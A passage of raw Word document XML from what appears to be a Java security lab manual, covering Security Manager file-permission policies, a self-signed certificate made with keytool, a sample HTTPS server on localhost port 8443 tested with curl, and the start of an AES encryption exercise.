          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1E7DCF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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD30F7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42DC2123" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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login.txt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updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F01867" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="2" w:line="284" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Modify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0"/>
        </w:rPr>
        <w:t>secure.policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-57"/>
          <w:sz w:val="20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rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>FilePermission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42E4F558" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="284" w:lineRule="exact"/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rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>login.txt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blocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>due to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restrictions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A50736" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="275"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2A127F15" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>◻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enforcing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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Security Manager policies to restrict unauthorized file access and ensure controlled security behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A201A7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/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261FE9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1017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Java-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>HTTPS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Java's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SSL libraries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 xml:space="preserve">client-server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA308FC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="129C6F23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16603F0D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360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HTTPS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SSL/TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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 xml:space="preserve">client-server </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055F8515" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C812250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410E2CE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57DE867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OpenSSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(for generating SSL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certificates)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED8910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25410D5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 or cURL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testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAA95BB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A3F04D1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0EA8B69F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7972AC6D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SSL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Certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4DDA6B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28C1086C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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self-signed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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Java‟s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keytool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106CF100" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E6657B4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="783"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>keytool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-genkeypair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-alias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myhttpsserver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-keyalg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RSA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-keystore keystore.jks -validity 365 -storepass password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773F71E6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580178C4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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prompted,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name, organization,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location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B82ECEA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C7B48E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 xml:space="preserve">HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2066ACD7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E017452" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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HttpsServerExample.java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38D83AD1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A553346" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="3597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40"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>com.sun.net.httpserver.HttpServer;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="40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com.sun.net.httpserver.HttpsConfigurator; import com.sun.net.httpserver.HttpsServer; import javax.net.ssl.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119CEBFC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1080" w:right="5720"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>import java.io.IOException;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java.io.OutputStream;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C15D712" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1080" w:right="5229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java.net.InetSocketAddress; import java.security.KeyStore; import java.io.FileInputStream;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE8B40A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225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HttpsServerExample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64FD00F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"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EED7CA2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keystore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D31AA2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="2701"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>char[]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"password".toCharArray(); KeyStore ks = KeyStore.getInstance("JKS");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B19324" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="783"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>FileInputStream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FileInputStream("keystore.jks"); ks.load(fis, password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F66A133" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226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up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KeyManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F42E230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KeyManagerFactory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kmf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KeyManagerFactory.getInstance("SunX509"); kmf.init(ks, password);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EC4245" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49B75491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up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SSL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context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19341020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SSLContext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sslContext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SSLContext.getInstance("TLS");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5B601B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact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82ECC3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83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sslContext.init(kmf.getKeyManagers(),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null,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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC1BF8A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75DE1501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HTTPS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server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D8BB93" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1080" w:right="783" w:firstLine="960"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HttpsServer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HttpsServer.create(new InetSocketAddress(8443), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA0EC1E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server.setHttpsConfigurator(new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HttpsConfigurator(sslContext)); server.createContext("/test", exchange -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148EFC17" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2520" w:right="783"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>String response = "Hello, Secure World!"; exchange.sendResponseHeaders(200,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response.length()); OutputStream os = exchange.getResponseBody(); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>os.write(response.getBytes());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C69B2E1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="252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os.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E00483E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 w14:paraId="3BE03895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23E77F9A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2040" w:right="522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server.setExecutor(null); server.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0316F7C3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System.out.println("HTTPS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started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port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8443");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232BABE3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D6DF836" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2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ED80ACE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21235CDA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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ADCCC4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="274"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>Compile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the Java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7A957688" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="12"/>
        <w:ind w:right="5877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HttpsServerExample.java java HttpsServerExample</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F13EDC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="50"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C0556B7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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will start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8443</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DC6753" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7974A182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Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A64E793" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53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 navigate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to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C14A2E1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="16"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB97F96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https://localhost:8443/test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D605BE8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="51"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B2B8E3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Alternatively,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2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>cURL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576B9BA1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563E4E0C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curl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-k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https://localhost:8443/test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F45050B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="50"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05DF32F1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hello,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World!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB20703" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC3F885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6F21FEE0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>◻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Java-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>HTTPS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encrypts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>client-server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SSL/TLS, ensuring secure data transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063BBB42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8B8B66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764"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Implement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>AES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securely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 xml:space="preserve">sensitive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506F9947" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64580EBC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213A2940" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>develop 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 uses AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encryption to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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 xml:space="preserve">sensitive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4D45C1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6279DE38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784EF3C4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4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07EA95D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4D83722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AES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(Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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API)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C0526F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B27529A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0E98B577" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13764FB4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Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDC6C15" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="273"/>
        <w:ind w:right="624"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Advanced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Standard)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symmetric</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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secure data storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B243D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52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It operates on blocks of data and supports key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sizes of 128, 192, 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256 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651A245B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F19BFD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AES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA0615" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC85748" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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AESEncryption.java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decryption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC91E2D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219786F5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1080" w:right="5397"/>
        <w:rPr>
